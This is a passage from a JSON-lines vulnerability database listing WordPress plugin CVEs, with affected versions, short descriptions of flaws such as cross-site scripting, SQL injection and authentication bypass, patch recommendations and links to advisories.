version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3324309%40wp-register-profile-with-shortcode&new=3324309%40wp-register-profile-with-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3324309%40wp-register-profile-with-shortcode&new=3324309%40wp-register-profile-with-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ae7f5e3-7312-4fee-962b-3aecd8432557?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ae7f5e3-7312-4fee-962b-3aecd8432557?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5263","slug":"elementskit","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Motion Text and Table widgets in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e718554-1096-4a16-968d-f00b65e1361d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e718554-1096-4a16-968d-f00b65e1361d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0334","slug":"shortpixel-adaptive-images","versionEndExcluding":"3.6.3","description":"The ShortPixel Adaptive Images WordPress plugin before 3.6.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b027a8db-0fd6-444d-b14a-0ae58f04f931\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b027a8db-0fd6-444d-b14a-0ae58f04f931\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4960","slug":"wc-multivendor-marketplace","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The WCFM Marketplace plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wcfm_stores' shortcode in versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99e9f01-cc98-4af5-bb95-f56f6a550e96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99e9f01-cc98-4af5-bb95-f56f6a550e96?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/views\\\/store-lists\\\/wcfmmp-view-store-lists.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/views\\\/store-lists\\\/wcfmmp-view-store-lists.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/core\\\/class-wcfmmp-shortcode.php#L241\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/core\\\/class-wcfmmp-shortcode.php#L241\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000763\\\/wc-multivendor-marketplace#file999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000763\\\/wc-multivendor-marketplace#file999\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4109","slug":"ninja-forms","versionEndExcluding":"3.6.26","description":"The Ninja Forms Contact Form WordPress plugin before 3.6.26 was affected by an HTML Injection security vulnerability.","recommendation":"Update to version 3.6.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/558e06ab-704b-4bb1-ba7f-b5f6bbbd68d9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/558e06ab-704b-4bb1-ba7f-b5f6bbbd68d9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1835","slug":"ninja-forms","versionEndExcluding":"3.6.22","description":"The Ninja Forms Contact Form WordPress plugin before 3.6.22 does not properly escape user input before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.6.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fc223c-5ec0-44b2-b2f6-b35f9942d341\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fc223c-5ec0-44b2-b2f6-b35f9942d341\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4452","slug":"elementskit","versionImpact":"3.6.1","versionEndExcluding":"3.6.2","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488ac848-786e-4100-a387-5a40e8fc4175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488ac848-786e-4100-a387-5a40e8fc4175?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11707","slug":"my-auctions-allegro-free-edition","versionImpact":"3.6.17","versionEndExcluding":"3.6.18","description":"The My auctions allegro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.6.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197924%40my-auctions-allegro-free-edition&new=3197924%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197924%40my-auctions-allegro-free-edition&new=3197924%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198824%40my-auctions-allegro-free-edition&new=3198824%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198824%40my-auctions-allegro-free-edition&new=3198824%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57a78696-5892-4621-992f-5e4a7d8fa965?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57a78696-5892-4621-992f-5e4a7d8fa965?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10584","slug":"directorypress","versionImpact":"3.6.16","versionEndExcluding":"3.6.17","description":"The DirectoryPress \u2013 Business Directory And Classified Ad Listing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.6.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. When DirectoryPress Frontend is installed, this can be exploited by unauthenticated users.","recommendation":"Update to version 3.6.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205071\\\/directorypress\\\/trunk\\\/includes\\\/directorypress_svg.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205071\\\/directorypress\\\/trunk\\\/includes\\\/directorypress_svg.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4625072b-815d-41d2-bf8f-ac290efde369?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4625072b-815d-41d2-bf8f-ac290efde369?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9863","slug":"miniorange-firebase-sms-otp-verification","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.6.0 due to the insecure 'administrator' default value for the 'default_user_role' option. This makes it possible for unauthenticated attackers to register an administrator user even if the registration form is disabled.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f04eab14-dd86-4145-b5eb-20d064bc8417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f04eab14-dd86-4145-b5eb-20d064bc8417?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-registrationform.php#L194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-registrationform.php#L194\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9862","slug":"miniorange-firebase-sms-otp-verification","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 3.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources, and the user current password check is missing. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3df12d-e526-4a23-89d3-bfdcea9f7b2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3df12d-e526-4a23-89d3-bfdcea9f7b2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L236\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9861","slug":"miniorange-firebase-sms-otp-verification","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.6.0. This is due to missing validation on the token being supplied during the otp login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the phone number associated with that user.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-firebase-sms-otp-verification\\\/tags\\\/3.6.0\\\/handler\\\/forms\\\/class-loginform.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169869\\\/miniorange-firebase-sms-otp-verification#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6261","slug":"final-tiles-grid-gallery-lite","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'FinalTilesGallery' shortcode in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/final-tiles-grid-gallery-lite\\\/trunk\\\/lightbox\\\/lightbox2\\\/js\\\/script.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/final-tiles-grid-gallery-lite\\\/trunk\\\/lightbox\\\/lightbox2\\\/js\\\/script.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123808\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123808\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d945c4b-3eb1-4bab-b355-117b7fd06553?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d945c4b-3eb1-4bab-b355-117b7fd06553?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3500","slug":"elementskit","versionImpact":"3.6.0","versionEndExcluding":"3.6.1","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.6.0 via the Price Menu, Hotspot, and Advanced Toggle widgets. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8ae0a47-cba5-468e-8d25-7b7176373b9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8ae0a47-cba5-468e-8d25-7b7176373b9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/account.wpmet.com\\\/downloads\\\/elementskit\\\/?changelog=1\",\"name\":\"https:\\\/\\\/account.wpmet.com\\\/downloads\\\/elementskit\\\/?changelog=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12202","slug":"croma-music","versionImpact":"3.6","versionEndExcluding":"3.6.1","description":"The Croma Music plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'ironMusic_ajax' function in all versions up to, and including, 3.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/croma.irontemplates.com\\\/lowtempo\\\/wp-content\\\/themes\\\/croma\\\/changelog.txt\",\"name\":\"https:\\\/\\\/croma.irontemplates.com\\\/lowtempo\\\/wp-content\\\/themes\\\/croma\\\/changelog.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ce8e0f1-5a7b-41a3-81d0-7fd12c9da6d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ce8e0f1-5a7b-41a3-81d0-7fd12c9da6d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1562","slug":"wp-marketing-automations","versionImpact":"3.5.3","versionEndExcluding":"3.6.0","description":"The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/api\\\/plugin_status\\\/class-bwfan-api-install-and-activate-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/api\\\/plugin_status\\\/class-bwfan-api-install-and-activate-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/class-bwfan-db.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/tags\\\/2.5.0\\\/includes\\\/class-bwfan-db.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/admin\\\/class-bwfan-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/admin\\\/class-bwfan-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/abstracts\\\/class-bwfan-api-base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/abstracts\\\/class-bwfan-api-base.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/class-bwfan-api-loader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305437\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/class-bwfan-api-loader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/094972e6-7e02-4060-b069-e39c8cde9331?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/094972e6-7e02-4060-b069-e39c8cde9331?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11342","slug":"skt-nurcaptcha","versionImpact":"3.5.0","versionEndExcluding":"3.6.0","description":"The Skt NURCaptcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.0. This is due to missing or incorrect nonce validation in the skt-nurc-admin.php file. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php?rev=3195583\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-nurcaptcha\\\/trunk\\\/skt-nurc-admin.php?rev=3195583\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195583%40skt-nurcaptcha&new=3195583%40skt-nurcaptcha&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195583%40skt-nurcaptcha&new=3195583%40skt-nurcaptcha&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e47918-7848-407a-8f77-dbbfeb17029d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e47918-7848-407a-8f77-dbbfeb17029d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4664","slug":"logo-slider-wp","versionEndExcluding":"3.6.0","description":"The Logo Slider WordPress plugin before 3.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a9cfaa-d3fa-442e-a9a1-b06588723e39\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a9cfaa-d3fa-442e-a9a1-b06588723e39\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3710","slug":"final-tiles-grid-gallery-lite","versionImpact":"2.5.8","versionEndExcluding":"3.6.0","description":"The Image Photo Gallery Final Tiles Grid WordPress plugin before 3.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bde10913-4f7e-4590-86eb-33bfa904f95f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bde10913-4f7e-4590-86eb-33bfa904f95f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5448","slug":"wp-register-profile-with-shortcode","versionImpact":"3.5.9","versionEndExcluding":"3.6.0","description":"The WP Register Profile With Shortcode plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.9. This is due to missing or incorrect nonce validation on the update_password_validate function. This makes it possible for unauthenticated attackers to reset a user's password via a forged request granted they can trick the user into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca564941-4780-4da2-b937-c9bd45966d81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca564941-4780-4da2-b937-c9bd45966d81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018102\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12624","slug":"sina-extension-for-elementor","versionImpact":"3.5.91","versionEndExcluding":"3.6.0","description":"The Sina Extension for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Image Differ widget in all versions up to, and including, 3.5.91 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211218\\\/sina-extension-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211218\\\/sina-extension-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f6fb61-25a9-4386-9b61-7343760fd28c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f6fb61-25a9-4386-9b61-7343760fd28c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5465","slug":"popup-with-fancybox","versionImpact":"3.5","versionEndExcluding":"3.6","description":"The Popup with fancybox plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c943cf0b-0e99-4d47-808d-2b803369d53a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c943cf0b-0e99-4d47-808d-2b803369d53a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-with-fancybox\\\/trunk\\\/popup-with-fancybox.php?rev=2827070#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-with-fancybox\\\/trunk\\\/popup-with-fancybox.php?rev=2827070#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985560\\\/popup-with-fancybox#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985560\\\/popup-with-fancybox#file1\",\"refsource\":\"\",\"tags\":[]}]"}
